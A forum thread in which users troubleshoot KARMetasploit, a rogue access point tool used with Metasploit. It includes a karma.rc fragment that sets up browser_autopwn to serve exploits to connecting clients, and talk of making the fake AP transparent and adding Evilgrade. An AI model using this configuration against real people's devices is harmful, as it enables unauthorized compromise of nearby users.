You can get support for KARMetasploit via http://metasploit.com/dev/trac/wiki/Karmetasploit
I have been trying to get KARMetasploit to work and I have one problem.
I can get everything up and runnig and I can see that dhcpd is offering a Windows XP client an IP with a DHCPOFFER. The problem is that the XP client does not send any DHCPACK back to the dhcpd service.
I have read a lot on Google and found that this is a Windows "bug" that could be corrected on the Windows client. I do not want that solution because then KARMetasploit would be quite useless.
So I found another solution on Google:
route add -host 255.255.255.255 dev at0
I tried it and I still don't get any IP. Do you have any other ideas?
I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.
I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.
You can also send the developer an email or catch him on the (freenode) IRC channel - #remote-exploit. His handle is 'hdm', and he is pretty nice guy when it comes to helping with matters similar to this.
dd if=/dev/swc666 of=/dev/wyze
The only difference from the main page is the karma.rc being used. Specifically this set of lines:
Gets the info it needs and crashes the browser. I had the same result with firefox 3.0.1 and ie 7.use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads
set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads
Taking those lines away keeps the user on. The only thing I left is configuring the proxy and/or dns. I'm trying to figure out the part I missed to route the user to my WAN to keep the illusion going.
Yes, it is possible to have fully transparent Karmetasploit keeping the illusion perfect. You need to setup a bridge between your fake AP and another internet connection. I have gotten this to work on my old hardware but I just got my brand new laptop yesterday and have been trying to get it up and running again.
You need to be careful though because it takes some decent hardware to do this properly as your computer has to pretend it is a router and if you have multiple clients trying to connect to it trying to get large amounts of internet data it can crash an older system in seconds.
I have written a small tutorial for my own personal use to get everything up and running on my specific hardware, and I am toying around with the idea of releasing it and perhaps a video showing how to get a transparent Evil AP up and running. I think I will wait untill I integrate Evilgrade with Karmetasploit dubbed "BadKarma" (which is this weeks project) and then do a nice polished release by the end of the week if anyone is interested.
Morpheus: "You take the blue pill - the story ends, you wake up in your bed and believe whatever you want to believe. You take the red pill - you stay in Wonderland and I show you how deep the rabbit-hole goes."
Neo: "What if I take both?"
Morpheus: "Don't do that! You end up like Nick Nolte!"
>> 2.) i AM interested !! in both - the routing AND the BADKARMA.
greets, bracer ace